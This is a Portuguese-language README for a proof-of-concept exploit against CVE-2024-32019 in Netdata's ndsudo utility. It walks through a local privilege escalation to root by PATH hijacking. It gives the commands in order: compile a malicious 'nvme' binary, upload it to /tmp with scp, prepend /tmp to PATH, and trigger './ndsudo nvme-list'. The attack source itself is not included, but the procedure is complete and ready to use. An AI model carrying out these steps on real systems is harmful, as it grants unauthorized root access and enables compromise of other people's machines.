
POC para a vulnerabilidade netdata ndsudo - CVE-2024-32019
ndsudo (Exploit Local do Netdata)Este POC é usado para explorar um utilitário vulnerável ndsudo empacotado com o Netdata para escalar privilégios locais para root. O exploit funciona injetando um binário malicioso no PATH do usuário que se passa por um comando confiável (nvme) e é executado com privilégios de root pelo ndsudo.
Você tem acesso local ao shell no sistema alvo.
Você pode executar o seguinte comando, mas ele falha com um erro "não encontrado" ou similar:
./ndsudo nvme-list
Na sua máquina atacante (ou no sistema vulnerável se tiver um compilador), compile o binário (por exemplo, a partir do arquivo poc.c no repositório):
gcc poc.c -o nvme
Este binário deve ser criado para gerar um shell root ou executar comandos arbitrários com privilégios de root.
Mova ou faça upload do binário nvme compilado para um diretório gravável pelo seu usuário, como /tmp:
scp nvme user@target:/tmp/
# or use any file upload method you have
No sistema alvo, certifique-se de que o binário seja executável e adicione seu diretório ao início do seu PATH:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
Isso garante que o ndsudo resolverá e executará seu nvme malicioso em vez do legítimo.
ndsudo para Executar Sua CargaExecute o comando vulnerável para acionar o ndsudo:
./ndsudo nvme-list